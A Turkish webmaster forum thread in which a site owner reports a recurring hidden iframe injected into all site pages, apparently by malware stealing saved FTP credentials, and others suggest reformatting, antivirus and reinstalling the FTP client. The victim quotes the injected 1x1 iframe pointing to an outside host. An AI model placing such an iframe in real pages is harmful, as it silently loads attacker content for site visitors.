İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

pcde index atan trojanı bulmak

pigeon

0
İyinet Üyesi
Reaction score
12
çinlilere bulaştık herhalde sitenin tüm sayfalarına iframe kodu eklenmiş. bazen çıkartıyor kodu, sonra yine ekliyor.. pcden kaynaklanıyor olmalı daha önce de başıma gelmişti formatla çözmüştüm, anti-yazılımlar bir işe yaramıyor.

<iframe src=dfwfd526.9966.org:5188/index.html?id=101 width=1 height=1></iframe>

baştaki http:// çıkarttım böyle bir kod. bu kodun kaynağı pc de ise nasıl bulabilirim?

E

Erturk

Misafir
Bir dönemin meşhur iframe virüsü'nün nasıl bulaştığına ve nasıl engellendiğine dair bir çok yazı yazıldı.

Arama Yap linkine tıklayarak bulabilirsiniz.

pigeon

0
İyinet Üyesi
Reaction score
12
teşekkür ederim linki arıyordum ben de.
gerçi ben nasıl bulaştığını veya nasıl engellendiğini sormamıştım. pcde ise nasıl bulabilirim di soru. 10 sene önce yazılırdı bunlar defalarca arama yapın diye. devir değişti ayak uydurmak lazım.
size iyi eğlenceler.

HostLife

0
İyinet Üyesi
Reaction score
5
Cute ftp kullanıyor iseniz program şifreleri kaydettiği için direk pc den şifreler ile giriş yapıp siz girdiğinizde virüs kendi kendine işlem yapabiliyor.

Garantili %100 çözümü format atıp ardından lisanslı antivirüs kullanın. (Şunuda belirtmek isterim piyasadaki nerdeyse tüm anti virüslerde şu var lisansı geçersiz kod ile kullanma yada key kırma ile yapıldığında güncellenmez siz ilk kurduğunuz ay çalışır gözükür oda deneme günü bitene kadardır. Daha sonra sahte lisans ile veritabanını değil sadece kendi bilgisayarınızdaki programı kandırırsınız.)

2. çözüm eğer cidden cute ftp kullanıyor iseniz format atmak istemiyor iseniz: Cuteyi kaldırıp tekrar kurun, ve bilgisayarınızı ziplerle dahil taratın.

Bu sorun en çok cute ftp kullanıcılarında olmaktadır, şahsen açıkcası örneğin filezilla kullananlarda görmedim yada hatırlamıyorum.

FTP programınız nedir?

pigeon

0
İyinet Üyesi
Reaction score
12
teşekkür ederim.
filezilla ve daha önce çok başıma geldi maalesef. o yüzden artık şifre sor ile giriyorum ftplere. şifre kayıtlıysa anında hersitede çıkıyor. yoksa sadece girdiğin ftpye bulaşıyor.
ben pc kaynaklı ise kodu bulabilir miyimin peşindeyim. sunucuya başka bir arkadaşın da erişimi var, amaç kayağı bulmak. file:///C:/Users/vs benzeri bir yolla bulunabilir mi gibi idi..

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5